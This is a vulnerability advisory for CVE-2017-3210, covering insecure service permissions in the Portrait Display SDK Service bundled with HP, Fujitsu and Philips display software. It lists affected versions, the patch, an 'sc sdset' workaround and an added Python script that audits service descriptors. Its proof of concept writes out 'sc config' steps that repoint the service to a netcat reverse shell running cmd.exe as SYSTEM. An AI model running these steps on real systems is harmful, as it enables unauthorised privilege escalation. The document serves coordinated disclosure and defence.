Portrait Display SDK Service Privilege Escalation Vulnerability

2017-04-26T00:00:00
ID 1337DAY-ID-27686
Type zdt
Reporter Schober
Modified 2017-04-26T00:00:00

Description

Exploit for windows platform in category remote exploits

              title: Privilege Escalation due to insecure service configuration
            product: Portrait Display SDK Service
 vulnerable version: multiple, see PoC
      fixed version: multiple, see solution
         CVE number: CVE-2017-3210
             impact: critical
           homepage: http://www.portrait.com/
              found: 2017-02-23
                 by: W. Schober (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"For nearly 20 years, Portrait Displays has provided customized software to
OEM monitor manufacturers across the globe. We develop tailored solutions,
encompassing the needs of today's changing marketplace.

Our technologies allow OEMs to provide their end users with a premium
interactive experience. Our engineers work hand-in-hand with leading OEMS,
ODMs, and GPU and scaler companies, to develop and implement cutting-edge
software solutions."

Source: http://www.portrait.com/technology.html


Business recommendation:
------------------------
SEC Consult recommends not to use this service in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
The Portrait Display SDK Service (PdiService.exe) configuration was found to
be writable for every authenticated user in a default installation. This
allows a local attacker to execute arbitrary code, elevate their privileges and
gain a shell with the privileges of the SYSTEM user.

The Portrait Display SDK Service is bundled with various OEM software packages
that ship by default on a wide range of notebooks. The software that includes
the SDK acts as a virtual OSD (On Screen Display) for "tuning" displays:
setting gamma values, changing color values etc.

The vulnerability was identified in the software "DisplayView Click" from
Fujitsu. Because the SDK is used in several software packages, SEC Consult
tried to identify other potentially vulnerable packages rebranded by Portrait
Displays, Inc. The following list is an excerpt of packages containing the
SDK, some of which are installed by default on notebooks of HP, Philips,
Fujitsu, etc.


-) Fujitsu DisplayView Click v5
-) Fujitsu DisplayView Click v6
-) HP Display Assistant
-) HP Display Control
-) HP Mobile Display Assistant v1
-) HP Mobile Display Assistant v2
-) HP My Display
-) HP My Display All-In-One/TouchSmart
-) HP Picture in Picture
-) Philips SmartControl II
-) Philips SmartControl Lite
-) Philips SmartControl Premium


Portrait Displays Inc. confirmed that at least the following packages are
vulnerable:

Fujitsu DisplayView Click
  Versions with issue: 6.0 build id: dtune-fts-R2014-04-22-1630-07,
                       6.01 build id: dtune-fts-R2014-05-13-1436-35
  The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite
  Version with issue: 5 build id: dtune-fus-R2012-09-26-1056-32
  The issue is addressed by a patch in Version 5.9 build id:
  dtune-fus-R2017-04-01-1212-32

HP Display Assistant
  Version with issue: 2.1 build id: dtune-hwp-R2012-10-31-1329-38
  The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22
  and above

HP My Display
  Version with issue: 2.01 build id: dtune-hpc-R2013-01-10-1507-17
  The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15
  and above

Philips Smart Control Premium
  Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13,
                       2.25 build id: dtune-plp-R2014-08-29-1016-05
  The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07

Furthermore, a more detailed summary of this advisory has been published at our
blog:
http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html

Proof of concept:
-----------------
To identify the permissions of the service the builtin Windows command "sc"
was used ("sc sdshow pdiservice" prints the service's security descriptor in
SDDL). The output of the command for the vulnerable service can be seen below:

  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
  (A;;CCLCSWRPWPDTLOCRRC;;;SY)
  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
  (A;;CCLCSWLOCRRC;;;IU)
  (A;;CCLCSWLOCRRC;;;SU)

By decoding the Security Descriptor Definition Language (SDDL) string into
human-readable form, SEC Consult was able to identify the following
permissions for the PdiService:

  RW NT AUTHORITY\Authenticated Users
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  NT AUTHORITY\INTERACTIVE
  R  NT AUTHORITY\SERVICE

Every authenticated user holds the DC (SERVICE_CHANGE_CONFIG), SD (DELETE),
WD (WRITE_DAC) and WO (WRITE_OWNER) rights on the service, as well as RP
(SERVICE_START) and WP (SERVICE_STOP). An attacker is therefore able to
execute arbitrary code by changing the service's binary path. The service runs
under the LocalSystem account, so the replaced binary is executed with SYSTEM
privileges, resulting in privilege escalation.

The workflow to execute arbitrary code is as follows:
1) Stop the service
   sc stop pdiservice
2) Alter the service binary path (note the original path from "sc qc pdiservice"
   first so it can be restored; the space after "binpath=" is required by sc)
   sc config pdiservice binpath= "C:\nc.exe -nv 127.0.0.1 4242 -e C:\WINDOWS\System32\cmd.exe"
3) Start the service
   sc start pdiservice

Because nc.exe is not a real service binary it never reports back to the
Service Control Manager, so "sc start" eventually returns an error (the
service did not respond in time). By then the reverse shell has already been
spawned as SYSTEM and has connected to the listener on port 4242.


Vulnerable / tested versions:
-----------------------------
The following list contains all vulnerable versions:

Fujitsu DisplayView Click
  Versions with issue: 6.0 build id: dtune-fts-R2014-04-22-1630-07,
                       6.01 build id: dtune-fts-R2014-05-13-1436-35
  The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite
  Version with issue: 5 build id: dtune-fus-R2012-09-26-1056-32
  The issue is addressed by a patch in Version 5.9 build id:
  dtune-fus-R2017-04-01-1212-32

HP Display Assistant
  Version with issue: 2.1 build id: dtune-hwp-R2012-10-31-1329-38
  The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22
  and above

HP My Display
  Version with issue: 2.01 build id: dtune-hpc-R2013-01-10-1507-17
  The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15
  and above

Philips Smart Control Premium
  Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13,
                       2.25 build id: dtune-plp-R2014-08-29-1016-05
  The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07


Vendor contact timeline:
------------------------
2017-03-01: Contacting vendor through email [email protected]
2017-03-01: Informing CERT/CC, asking for coordination support regarding HW
            vendors, assigned VU#219739
2017-03-01: The vendor responds and requests all attachments as plaintext in
            the email body because they are not allowed to open any attachments
            from "unknown parties".
            Therefore SEC Consult sends the PGP public keys as plaintext in the
            body of the email.
2017-03-08: Contacting vendor again on how to transmit the advisory; no answer
2017-03-15: Informing CERT/CC about the status, asking for support to contact
            the vendor
2017-03-16: The Vendor provides a public key for encrypted communication;
            The advisory got securely transmitted to the vendor.
2017-03-18: The vendor responds and confirms that they were able to reproduce
            the vulnerability. Detailed information, on which Brands are
            affected, as well as a timeline for an update will be provided next
            week.
2017-03-28: Requesting update from Portrait Displays Inc. Asking about current
            state and a list of affected vendors.
2017-03-29: The vendor responds that they are still in the process of
            evaluating which 3rd parties are affected.
2017-04-06: Vendor updates us with information about the planned release
            schedule and affected vendors. Portrait is still in the process of
            evaluating which 3rd parties are affected. The list should be
            available at the end of the week. A patch that removes the invalid
            permission will be available on the vendor's website.
2017-04-17: Vendor provides us with a detailed list of affected products.
2017-04-18: Vendor publicly releases a patch for the vulnerability on their
            website (http://www.portrait.com/securityupdate.html)
2017-04-21: SEC Consult requests a CVE from CERT/CC and coordinates the
            disclosure of the CERT VU and the SEC Consult advisory.
2017-04-25: Public release.

Solution:
---------
A patch has been available since 18 April 2017.
See: http://www.portrait.com/securityupdate.html

Workaround:
-----------
To quickly get rid of the vulnerability, the permissions of the service should
be altered with the built-in Windows command "sc". To completely remove the
permissions of the "Authenticated Users" group, the following command can be
used from an elevated (administrator) command prompt; the SDDL string must be
passed as a single argument on one line:

sc sdset pdiservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)

Afterwards "sc sdshow pdiservice" should show only these four ACEs, which
result in the following set of permissions:
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  NT AUTHORITY\INTERACTIVE
  R  NT AUTHORITY\SERVICE
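The decoding that the proof of concept above does by hand, and the ACE removal
that the workaround's "sc sdset" string performs, can both be automated. The
following Python script is an added example and is not part of the SEC Consult
advisory or of Portrait Displays' software: it parses a service SDDL string,
flags allow-ACEs that give a principal other than SYSTEM or Administrators the
rights needed to reconfigure or take over the service (SERVICE_CHANGE_CONFIG,
DELETE, WRITE_DAC, WRITE_OWNER), and emits the hardened DACL with those ACEs
stripped. The embedded sample is the PdiService DACL printed in the proof of
concept; the function names, the TRUSTED set and the live lookup through
"sc.exe sdshow" are our assumptions, not anything the advisory specifies.

```python
"""Audit a Windows service security descriptor (SDDL) for rights that let
non-administrators reconfigure the service, and build the hardened descriptor.

Added example for this advisory; it is not SEC Consult's or Portrait Displays'
code. The sample SDDL is the PdiService descriptor printed in the advisory;
all function names are ours. With no arguments it audits the sample; on
Windows, pass service names to audit live descriptors via `sc.exe sdshow`.
"""
import re
import subprocess
import sys

# Service access rights as SDDL two-letter tokens (Windows SDDL grammar).
RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# Rights that let the holder change what the service executes or who controls
# it: change the binary path, delete/recreate it, or rewrite its DACL/owner.
DANGEROUS = ("DC", "SD", "WD", "WO")
# Well-known SID abbreviations. Note that "WD" as a SID means Everyone (World),
# while "WD" as a rights token means WRITE_DAC; the two never share a field.
SIDS = {
    "AU": r"NT AUTHORITY\Authenticated Users", "SY": r"NT AUTHORITY\SYSTEM",
    "BA": r"BUILTIN\Administrators", "IU": r"NT AUTHORITY\INTERACTIVE",
    "SU": r"NT AUTHORITY\SERVICE", "WD": "Everyone", "BU": r"BUILTIN\Users",
}
# Principals expected to hold full control of a service (our assumption).
TRUSTED = {"SY", "BA"}

# PdiService DACL as printed in the advisory (no "D:" prefix, one ACE per line).
ADVISORY_SDDL = """
  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
  (A;;CCLCSWRPWPDTLOCRRC;;;SY)
  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
  (A;;CCLCSWLOCRRC;;;IU)
  (A;;CCLCSWLOCRRC;;;SU)
"""

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_aces(sddl):
    """Yield (raw_ace, ace_type, rights_tokens, sid) for each ACE in the DACL."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    dacl = dacl.split("S:", 1)[0]  # drop any SACL that follows the DACL
    for raw in ACE_RE.findall(dacl):
        fields = raw.split(";")  # type;flags;rights;object;inherit_object;sid
        if len(fields) != 6:
            raise ValueError("malformed ACE: (%s)" % raw)
        ace_type, rights, sid = fields[0], fields[2], fields[5]
        if rights.startswith("0x"):
            raise ValueError("hex access mask not decoded: %s" % rights)
        tokens = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        yield raw, ace_type, tokens, sid


def audit(sddl):
    """Return [(principal, [right names])] for allow-ACEs that hand DANGEROUS
    rights to a principal outside TRUSTED. An empty list means the DACL is clean."""
    findings = []
    for _, ace_type, tokens, sid in parse_aces(sddl):
        if ace_type != "A" or sid in TRUSTED:
            continue
        bad = [RIGHTS[t] for t in tokens if t in DANGEROUS]
        if bad:
            findings.append((SIDS.get(sid, sid), bad))
    return findings


def harden(sddl):
    """Return a DACL-only SDDL string with every ACE that audit() flags removed.
    For the advisory's sample this reproduces the workaround's `sc sdset` string."""
    kept = [raw for raw, ace_type, tokens, sid in parse_aces(sddl)
            if not (ace_type == "A" and sid not in TRUSTED
                    and any(t in DANGEROUS for t in tokens))]
    return "D:" + "".join("(%s)" % raw for raw in kept)


def live_sddl(service):
    """Fetch a service's descriptor on Windows (assumes sc.exe is on PATH)."""
    proc = subprocess.run(["sc.exe", "sdshow", service],
                          capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def report(name, sddl):
    """Print a one-line verdict plus the remediation command; return findings."""
    findings = audit(sddl)
    print("[%s] %s" % ("VULNERABLE" if findings else "ok", name))
    for principal, rights in findings:
        print("    %s: %s" % (principal, ", ".join(rights)))
    if findings:
        print("    remediation: sc sdset <service> %s" % harden(sddl))
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for svc in sys.argv[1:]:
            report(svc, live_sddl(svc))
    else:
        report("pdiservice (sample from advisory)", ADVISORY_SDDL)
```

Run without arguments it reports Authenticated Users with
SERVICE_CHANGE_CONFIG, DELETE, WRITE_DAC and WRITE_OWNER and prints exactly the
SDDL from the workaround; on a Windows host, "python sddl_audit.py pdiservice
OtherService" audits live services. The check is deliberately broader than the
single case in the advisory: any allow-ACE for a principal other than SYSTEM or
Administrators that carries one of the four takeover rights is flagged, which
also catches Everyone (WD) and BUILTIN\Users (BU). INTERACTIVE and SERVICE are
not treated as trusted, but their ACEs here carry only query and interrogate
rights, so they pass. Removing the Authenticated Users ACE entirely, as the
workaround does, is simpler than editing it down, and SYSTEM and Administrators
keep every right they had.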

#  0day.today [2018-03-19]  #